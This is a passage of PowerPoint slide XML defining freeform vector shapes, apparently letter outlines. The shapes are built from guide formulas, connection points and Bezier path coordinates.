                <a:gd name="T4" fmla="*/ 0 w 62"/>
                <a:gd name="T5" fmla="*/ 31 h 62"/>
                <a:gd name="T6" fmla="*/ 31 w 62"/>
                <a:gd name="T7" fmla="*/ 62 h 62"/>
                <a:gd name="T8" fmla="*/ 62 w 62"/>
                <a:gd name="T9" fmla="*/ 31 h 62"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="62" h="62">
                  <a:moveTo>
                    <a:pt x="62" y="31"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="13"/>
                    <a:pt x="48" y="0"/>
                    <a:pt x="32" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="16"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="49"/>
                    <a:pt x="15" y="62"/>
                    <a:pt x="31" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="62"/>
                    <a:pt x="62" y="47"/>
                    <a:pt x="62"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6" name="Freeform 76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88A52BEE-8D69-4FD4-8B5C-47B969FCD107}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId124"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5092700" y="2605088"/>
              <a:ext cx="82550" cy="114300"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 196 w 196"/>
                <a:gd name="T1" fmla="*/ 165 h 222"/>
                <a:gd name="T2" fmla="*/ 179 w 196"/>
                <a:gd name="T3" fmla="*/ 151 h 222"/>
                <a:gd name="T4" fmla="*/ 162 w 196"/>
                <a:gd name="T5" fmla="*/ 162 h 222"/>
                <a:gd name="T6" fmla="*/ 113 w 196"/>
                <a:gd name="T7" fmla="*/ 192 h 222"/>
                <a:gd name="T8" fmla="*/ 35 w 196"/>
                <a:gd name="T9" fmla="*/ 112 h 222"/>
                <a:gd name="T10" fmla="*/ 116 w 196"/>
                <a:gd name="T11" fmla="*/ 30 h 222"/>
                <a:gd name="T12" fmla="*/ 146 w 196"/>
                <a:gd name="T13" fmla="*/ 35 h 222"/>
                <a:gd name="T14" fmla="*/ 168 w 196"/>
                <a:gd name="T15" fmla="*/ 59 h 222"/>
                <a:gd name="T16" fmla="*/ 190 w 196"/>
                <a:gd name="T17" fmla="*/ 36 h 222"/>
                <a:gd name="T18" fmla="*/ 116 w 196"/>
                <a:gd name="T19" fmla="*/ 0 h 222"/>
                <a:gd name="T20" fmla="*/ 0 w 196"/>
                <a:gd name="T21" fmla="*/ 112 h 222"/>
                <a:gd name="T22" fmla="*/ 110 w 196"/>
                <a:gd name="T23" fmla="*/ 222 h 222"/>
                <a:gd name="T24" fmla="*/ 196 w 196"/>
                <a:gd name="T25"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22">
                  <a:moveTo>
                    <a:pt x="196" y="165"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="151"/>
                    <a:pt x="182" y="151"/>
                    <a:pt x="179" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="151"/>
                    <a:pt x="166" y="152"/>
                    <a:pt x="162" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="169"/>
                    <a:pt x="150" y="192"/>
                    <a:pt x="113" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="192"/>
                    <a:pt x="35" y="157"/>
                    <a:pt x="35" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="88"/>
                    <a:pt x="49" y="30"/>
                    <a:pt x="116" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="30"/>
                    <a:pt x="146" y="30"/>
                    <a:pt x="146" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="52"/>
                    <a:pt x="156" y="59"/>
                    <a:pt x="168" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="59"/>
                    <a:pt x="190" y="51"/>
                    <a:pt x="190" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="0"/>
                    <a:pt x="138" y="0"/>
                    <a:pt x="116" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="0"/>
                    <a:pt x="0" y="68"/>
                    <a:pt x="0" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="47" y="222"/>
                    <a:pt x="110" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="222"/>
                    <a:pt x="196" y="174"/>
                    <a:pt x="196"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7" name="Freeform 77">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B241F529-DB7C-4742-BCB1-9BB54CA2104F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId125"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5200650" y="2605088"/>
              <a:ext cx="85725" cy="114300"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 204 w 204"/>
                <a:gd name="T1" fmla="*/ 112 h 222"/>
                <a:gd name="T2" fmla="*/ 102 w 204"/>
                <a:gd name="T3" fmla="*/ 0 h 222"/>
                <a:gd name="T4" fmla="*/ 0 w 204"/>
                <a:gd name="T5" fmla="*/ 112 h 222"/>
                <a:gd name="T6" fmla="*/ 102 w 204"/>
                <a:gd name="T7" fmla="*/ 222 h 222"/>
                <a:gd name="T8" fmla="*/ 204 w 204"/>
                <a:gd name="T9" fmla="*/ 112 h 222"/>
                <a:gd name="T10" fmla="*/ 102 w 204"/>
                <a:gd name="T11" fmla="*/ 192 h 222"/>
                <a:gd name="T12" fmla="*/ 34 w 204"/>
                <a:gd name="T13" fmla="*/ 108 h 222"/>
                <a:gd name="T14" fmla="*/ 102 w 204"/>
                <a:gd name="T15" fmla="*/ 30 h 222"/>
                <a:gd name="T16" fmla="*/ 170 w 204"/>
                <a:gd name="T17" fmla="*/ 108 h 222"/>
                <a:gd name="T18" fmla="*/ 102 w 204"/>
                <a:gd name="T19" fmla="*/ 1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22">
                  <a:moveTo>
                    <a:pt x="204" y="112"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="158" y="0"/>
                    <a:pt x="102" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="0"/>
                    <a:pt x="0" y="49"/>
                    <a:pt x="0" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="175"/>
                    <a:pt x="47" y="222"/>
                    <a:pt x="102" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="222"/>
                    <a:pt x="204" y="175"/>
                    <a:pt x="204" y="112"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="102" y="192"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="192"/>
                    <a:pt x="34" y="155"/>
                    <a:pt x="34" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="63"/>
                    <a:pt x="67" y="30"/>
                    <a:pt x="102" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="30"/>
                    <a:pt x="170" y="63"/>
                    <a:pt x="170" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="155"/>
                    <a:pt x="139" y="192"/>
                    <a:pt x="102"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8" name="Freeform 78">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C51FDC8-D439-41C2-8FAE-4C1A265DF216}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId126"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5310188" y="2605088"/>
              <a:ext cx="87313" cy="114300"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 205 w 205"/>
                <a:gd name="T1" fmla="*/ 112 h 222"/>
                <a:gd name="T2" fmla="*/ 103 w 205"/>
                <a:gd name="T3" fmla="*/ 0 h 222"/>
                <a:gd name="T4" fmla="*/ 0 w 205"/>
                <a:gd name="T5" fmla="*/ 112 h 222"/>
                <a:gd name="T6" fmla="*/ 103 w 205"/>
                <a:gd name="T7" fmla="*/ 222 h 222"/>
                <a:gd name="T8" fmla="*/ 205 w 205"/>
                <a:gd name="T9" fmla="*/ 112 h 222"/>
                <a:gd name="T10" fmla="*/ 103 w 205"/>
                <a:gd name="T11" fmla="*/ 192 h 222"/>
                <a:gd name="T12" fmla="*/ 35 w 205"/>
                <a:gd name="T13" fmla="*/ 108 h 222"/>
                <a:gd name="T14" fmla="*/ 103 w 205"/>
                <a:gd name="T15" fmla="*/ 30 h 222"/>
                <a:gd name="T16" fmla="*/ 170 w 205"/>
                <a:gd name="T17" fmla="*/ 108 h 222"/>
                <a:gd name="T18" fmla="*/ 103 w 205"/>
                <a:gd name="T19" fmla="*/ 1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22">
                  <a:moveTo>
                    <a:pt x="205" y="112"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="49"/>
                    <a:pt x="159" y="0"/>
                    <a:pt x="103" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="0"/>
                    <a:pt x="0" y="49"/>
                    <a:pt x="0" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="175"/>
                    <a:pt x="48" y="222"/>
                    <a:pt x="103" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="222"/>
                    <a:pt x="205" y="175"/>
                    <a:pt x="205" y="112"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="103" y="192"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="192"/>
                    <a:pt x="35" y="155"/>
                    <a:pt x="35" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="63"/>
                    <a:pt x="67" y="30"/>
                    <a:pt x="103" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="30"/>
                    <a:pt x="170" y="63"/>
                    <a:pt x="170" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="155"/>
                    <a:pt x="140" y="192"/>
                    <a:pt x="103"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89" name="Freeform 79">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B99D780-1529-4412-B34D-908EACE40A7E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId127"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5413375" y="2560638"/>
              <a:ext cx="103188" cy="157163"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 133 w 243"/>
                <a:gd name="T1" fmla="*/ 178 h 305"/>
                <a:gd name="T2" fmla="*/ 194 w 243"/>
                <a:gd name="T3" fmla="*/ 121 h 305"/>
                <a:gd name="T4" fmla="*/ 211 w 243"/>
                <a:gd name="T5" fmla="*/ 121 h 305"/>
                <a:gd name="T6" fmla="*/ 232 w 243"/>
                <a:gd name="T7" fmla="*/ 106 h 305"/>
                <a:gd name="T8" fmla="*/ 211 w 243"/>
                <a:gd name="T9" fmla="*/ 90 h 305"/>
                <a:gd name="T10" fmla="*/ 135 w 243"/>
                <a:gd name="T11" fmla="*/ 90 h 305"/>
                <a:gd name="T12" fmla="*/ 115 w 243"/>
                <a:gd name="T13" fmla="*/ 106 h 305"/>
                <a:gd name="T14" fmla="*/ 135 w 243"/>
                <a:gd name="T15" fmla="*/ 121 h 305"/>
                <a:gd name="T16" fmla="*/ 153 w 243"/>
                <a:gd name="T17" fmla="*/ 121 h 305"/>
                <a:gd name="T18" fmla="*/ 72 w 243"/>
                <a:gd name="T19" fmla="*/ 197 h 305"/>
                <a:gd name="T20" fmla="*/ 72 w 243"/>
                <a:gd name="T21" fmla="*/ 21 h 305"/>
                <a:gd name="T22" fmla="*/ 52 w 243"/>
                <a:gd name="T23" fmla="*/ 0 h 305"/>
                <a:gd name="T24" fmla="*/ 20 w 243"/>
                <a:gd name="T25" fmla="*/ 0 h 305"/>
                <a:gd name="T26" fmla="*/ 0 w 243"/>
                <a:gd name="T27" fmla="*/ 15 h 305"/>
                <a:gd name="T28" fmla="*/ 20 w 243"/>
                <a:gd name="T29" fmla="*/ 31 h 305"/>
                <a:gd name="T30" fmla="*/ 44 w 243"/>
                <a:gd name="T31" fmla="*/ 31 h 305"/>
                <a:gd name="T32" fmla="*/ 44 w 243"/>
                <a:gd name="T33" fmla="*/ 275 h 305"/>
                <a:gd name="T34" fmla="*/ 20 w 243"/>
                <a:gd name="T35" fmla="*/ 275 h 305"/>
                <a:gd name="T36" fmla="*/ 0 w 243"/>
                <a:gd name="T37" fmla="*/ 290 h 305"/>
                <a:gd name="T38" fmla="*/ 20 w 243"/>
                <a:gd name="T39" fmla="*/ 305 h 305"/>
                <a:gd name="T40" fmla="*/ 97 w 243"/>
                <a:gd name="T41" fmla="*/ 305 h 305"/>
                <a:gd name="T42" fmla="*/ 117 w 243"/>
                <a:gd name="T43" fmla="*/ 290 h 305"/>
                <a:gd name="T44" fmla="*/ 97 w 243"/>
                <a:gd name="T45" fmla="*/ 275 h 305"/>
                <a:gd name="T46" fmla="*/ 72 w 243"/>
                <a:gd name="T47" fmla="*/ 275 h 305"/>
                <a:gd name="T48" fmla="*/ 72 w 243"/>
                <a:gd name="T49" fmla="*/ 235 h 305"/>
                <a:gd name="T50" fmla="*/ 112 w 243"/>
                <a:gd name="T51" fmla="*/ 198 h 305"/>
                <a:gd name="T52" fmla="*/ 172 w 243"/>
                <a:gd name="T53" fmla="*/ 275 h 305"/>
                <a:gd name="T54" fmla="*/ 144 w 243"/>
                <a:gd name="T55" fmla="*/ 290 h 305"/>
                <a:gd name="T56" fmla="*/ 164 w 243"/>
                <a:gd name="T57" fmla="*/ 305 h 305"/>
                <a:gd name="T58" fmla="*/ 222 w 243"/>
                <a:gd name="T59" fmla="*/ 305 h 305"/>
                <a:gd name="T60" fmla="*/ 243 w 243"/>
                <a:gd name="T61" fmla="*/ 290 h 305"/>
                <a:gd name="T62" fmla="*/ 222 w 243"/>
                <a:gd name="T63" fmla="*/ 275 h 305"/>
                <a:gd name="T64" fmla="*/ 207 w 243"/>
                <a:gd name="T65" fmla="*/ 275 h 305"/>
                <a:gd name="T66" fmla="*/ 133 w 243"/>
                <a:gd name="T67" fmla="*/ 17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3" h="305">
                  <a:moveTo>
                    <a:pt x="133" y="178"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="194" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211" y="121"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="219" y="121"/>
                    <a:pt x="232" y="121"/>
                    <a:pt x="232" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="90"/>
                    <a:pt x="219" y="90"/>
                    <a:pt x="211" y="90"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="135" y="90"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="90"/>
                    <a:pt x="115" y="90"/>
                    <a:pt x="115" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="121"/>
                    <a:pt x="127" y="121"/>
                    <a:pt x="135" y="121"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="153" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72" y="197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="5"/>
                    <a:pt x="69" y="0"/>
                    <a:pt x="52" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="12" y="31"/>
                    <a:pt x="20" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="44" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="275"/>
                    <a:pt x="0" y="275"/>
                    <a:pt x="0" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="12" y="305"/>
                    <a:pt x="20" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="97" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="305"/>
                    <a:pt x="117" y="305"/>
                    <a:pt x="117" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="275"/>
                    <a:pt x="105" y="275"/>
                    <a:pt x="97" y="275"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72" y="235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112" y="198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172" y="275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="275"/>
                    <a:pt x="144" y="275"/>
                    <a:pt x="144" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="305"/>
                    <a:pt x="156" y="305"/>
                    <a:pt x="164" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="222" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="305"/>
                    <a:pt x="243" y="305"/>
                    <a:pt x="243" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="243" y="275"/>
                    <a:pt x="230" y="275"/>
                    <a:pt x="222" y="275"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="207" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133" y="17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0" name="Freeform 80">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98FF1D62-53B3-4D22-92C1-59D52214A517}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId128"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5537200" y="2560638"/>
              <a:ext cx="79375" cy="157163"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 115 w 188"/>
                <a:gd name="T1" fmla="*/ 111 h 305"/>
                <a:gd name="T2" fmla="*/ 95 w 188"/>
                <a:gd name="T3" fmla="*/ 90 h 305"/>
                <a:gd name="T4" fmla="*/ 24 w 188"/>
                <a:gd name="T5" fmla="*/ 90 h 305"/>
                <a:gd name="T6" fmla="*/ 4 w 188"/>
                <a:gd name="T7" fmla="*/ 105 h 305"/>
                <a:gd name="T8" fmla="*/ 24 w 188"/>
                <a:gd name="T9" fmla="*/ 121 h 305"/>
                <a:gd name="T10" fmla="*/ 81 w 188"/>
                <a:gd name="T11" fmla="*/ 121 h 305"/>
                <a:gd name="T12" fmla="*/ 81 w 188"/>
                <a:gd name="T13" fmla="*/ 275 h 305"/>
                <a:gd name="T14" fmla="*/ 20 w 188"/>
                <a:gd name="T15" fmla="*/ 275 h 305"/>
                <a:gd name="T16" fmla="*/ 0 w 188"/>
                <a:gd name="T17" fmla="*/ 290 h 305"/>
                <a:gd name="T18" fmla="*/ 20 w 188"/>
                <a:gd name="T19" fmla="*/ 305 h 305"/>
                <a:gd name="T20" fmla="*/ 168 w 188"/>
                <a:gd name="T21" fmla="*/ 305 h 305"/>
                <a:gd name="T22" fmla="*/ 188 w 188"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 168 w 188"/>
                <a:gd name="T25" fmla="*/ 275 h 305"/>
                <a:gd name="T26" fmla="*/ 115 w 188"/>
                <a:gd name="T27" fmla="*/ 275 h 305"/>
                <a:gd name="T28" fmla="*/ 115 w 188"/>
                <a:gd name="T29" fmla="*/ 111 h 305"/>
                <a:gd name="T30" fmla="*/ 115 w 188"/>
                <a:gd name="T31" fmla="*/ 25 h 305"/>
                <a:gd name="T32" fmla="*/ 90 w 188"/>
                <a:gd name="T33" fmla="*/ 0 h 305"/>
                <a:gd name="T34" fmla="*/ 65 w 188"/>
                <a:gd name="T35" fmla="*/ 25 h 305"/>
                <a:gd name="T36" fmla="*/ 90 w 188"/>
                <a:gd name="T37" fmla="*/ 50 h 305"/>
                <a:gd name="T38" fmla="*/ 115 w 188"/>
                <a:gd name="T39" fmla="*/ 2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5" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="95"/>
                    <a:pt x="112" y="90"/>
                    <a:pt x="95" y="90"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="24" y="90"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="90"/>
                    <a:pt x="4" y="90"/>
                    <a:pt x="4" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="121"/>
                    <a:pt x="17" y="121"/>
                    <a:pt x="24" y="121"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="81" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="275"/>
                    <a:pt x="0" y="275"/>
                    <a:pt x="0" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="13" y="305"/>
                    <a:pt x="20" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="168" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="305"/>
                    <a:pt x="188" y="305"/>
                    <a:pt x="188" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="275"/>
                    <a:pt x="175" y="275"/>
                    <a:pt x="168" y="275"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115" y="111"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="115" y="25"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="11"/>
                    <a:pt x="104" y="0"/>
                    <a:pt x="90" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="0"/>
                    <a:pt x="65" y="11"/>
                    <a:pt x="65" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="39"/>
                    <a:pt x="76" y="50"/>
                    <a:pt x="90" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="50"/>
                    <a:pt x="115" y="39"/>
                    <a:pt x="115"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1" name="Freeform 81">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D2951C2-5303-4C43-B1FA-92547E44CE43}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId129"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5641975" y="2605088"/>
              <a:ext cx="87313" cy="114300"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 204"/>
                <a:gd name="T1" fmla="*/ 124 h 222"/>
                <a:gd name="T2" fmla="*/ 204 w 204"/>
                <a:gd name="T3" fmla="*/ 106 h 222"/>
                <a:gd name="T4" fmla="*/ 107 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 222"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 111 h 222"/>
                <a:gd name="T8" fmla="*/ 115 w 204"/>
                <a:gd name="T9" fmla="*/ 222 h 222"/>
                <a:gd name="T10" fmla="*/ 204 w 204"/>
                <a:gd name="T11" fmla="*/ 165 h 222"/>
                <a:gd name="T12" fmla="*/ 187 w 204"/>
                <a:gd name="T13" fmla="*/ 151 h 222"/>
                <a:gd name="T14" fmla="*/ 170 w 204"/>
                <a:gd name="T15" fmla="*/ 162 h 222"/>
                <a:gd name="T16" fmla="*/ 118 w 204"/>
                <a:gd name="T17" fmla="*/ 192 h 222"/>
                <a:gd name="T18" fmla="*/ 35 w 204"/>
                <a:gd name="T19" fmla="*/ 124 h 222"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 124 h 222"/>
                <a:gd name="T22" fmla="*/ 36 w 204"/>
                <a:gd name="T23" fmla="*/ 94 h 222"/>
                <a:gd name="T24" fmla="*/ 107 w 204"/>
                <a:gd name="T25" fmla="*/ 30 h 222"/>
                <a:gd name="T26" fmla="*/ 169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5" y="124"/>
                    <a:pt x="204" y="124"/>
                    <a:pt x="204" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="107" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="50" y="222"/>
                    <a:pt x="115" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="222"/>
                    <a:pt x="204" y="178"/>
                    <a:pt x="204" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="151"/>
                    <a:pt x="190" y="151"/>
                    <a:pt x="187" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="151"/>
                    <a:pt x="174" y="153"/>
                    <a:pt x="170" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="187"/>
                    <a:pt x="132" y="192"/>
